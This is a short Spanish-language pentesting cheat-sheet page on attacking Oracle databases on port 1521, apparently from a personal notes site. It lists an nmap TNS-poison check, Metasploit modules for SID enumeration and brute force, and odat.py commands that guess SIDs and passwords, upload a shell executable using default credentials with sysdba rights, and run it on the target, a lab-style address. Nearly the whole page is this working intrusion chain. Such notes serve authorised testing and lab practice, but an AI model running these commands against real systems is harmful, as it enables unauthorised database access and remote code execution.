1521 - OracleDB

Nmap

nmap -p 1521 --script=oracle-vuln-tns-poison IP

Probar

METASPLOIT

use auxiliary/scanner/oracle/tnslsnr_version
use auxiliary/scanner/oracle/tnspoison_checker
use auxiliary/scanner/oracle/sid_enum
use auxiliary/scanner/oracle/sid_brute

Enumerar SID

./odat.py sidguesser -s 10.10.10.82

Fuerza bruta

Cuidadin con los diccionarios por defecto que viene todo en mayuscula y Oracle distingue entre mayusculas y minusculas

./odat.py passwordguesser -s 10.10.10.82 -d XE
./odat.py passwordguesser -s 10.10.10.82 -d XE --acounts-file accounts/accounts.txt

Subir una shell

./odat.py utlfile -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --putFile c:/ shell.exe shell.exe

Ejecutar un fichero

./odat.py externaltable -s 10.10.10.82 -d XE -U scott -P tiger --sysdba --exec c:/ shell.exe

Referencias

https://github.com/quentinhardy/odat

https://github.com/quentinhardy/odat/wiki

Previous1433/1434 - MS SQL ServerNext1720 - VoIP - SIP

Last updated